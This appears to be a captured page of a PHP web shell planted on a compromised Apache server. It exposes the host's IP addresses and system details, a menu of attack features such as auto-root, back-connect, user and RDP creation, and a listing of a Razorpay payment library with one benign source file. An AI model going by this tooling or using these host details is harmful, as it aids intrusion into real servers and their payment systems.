Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.161.119
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
razorpay /
razorpay-php /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Errors
[ DIR ]
drwxr-xr-x
Api.php
1.71
KB
-rwxr-xr-x
ArrayableInterface.php
190
B
-rwxr-xr-x
Card.php
196
B
-rwxr-xr-x
Collection.php
324
B
-rwxr-xr-x
Customer.php
661
B
-rwxr-xr-x
Entity.php
4.65
KB
-rwxr-xr-x
Invoice.php
414
B
-rwxr-xr-x
Order.php
594
B
-rwxr-xr-x
Payment.php
1014
B
-rwxr-xr-x
Refund.php
410
B
-rwxr-xr-x
Request.php
5.51
KB
-rwxr-xr-x
Resource.php
1.09
KB
-rwxr-xr-x
Token.php
707
B
-rwxr-xr-x
Utility.php
1.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Resource.php
<?php namespace Razorpay\Api; use ArrayAccess; use ArrayIterator; use IteratorAggregate; class Resource implements ArrayAccess, IteratorAggregate { protected $attributes = array(); public function getIterator() { return new ArrayIterator($this->attributes); } public function offsetExists($offset) { return (isset($this->attributes[$offset])); } public function offsetSet($offset, $value) { $this->attributes[$offset] = $value; } public function offsetGet($offset) { return $this->attributes[$offset]; } public function offsetUnset($offset) { unset($this->attributes[$offset]); } public function __get($key) { return $this->attributes[$key]; } public function __set($key, $value) { return $this->attributes[$key] = $value; } public function __isset($key) { return (isset($this->attributes[$key])); } public function __unset($key) { unset($this->attributes[$key]); } }
Close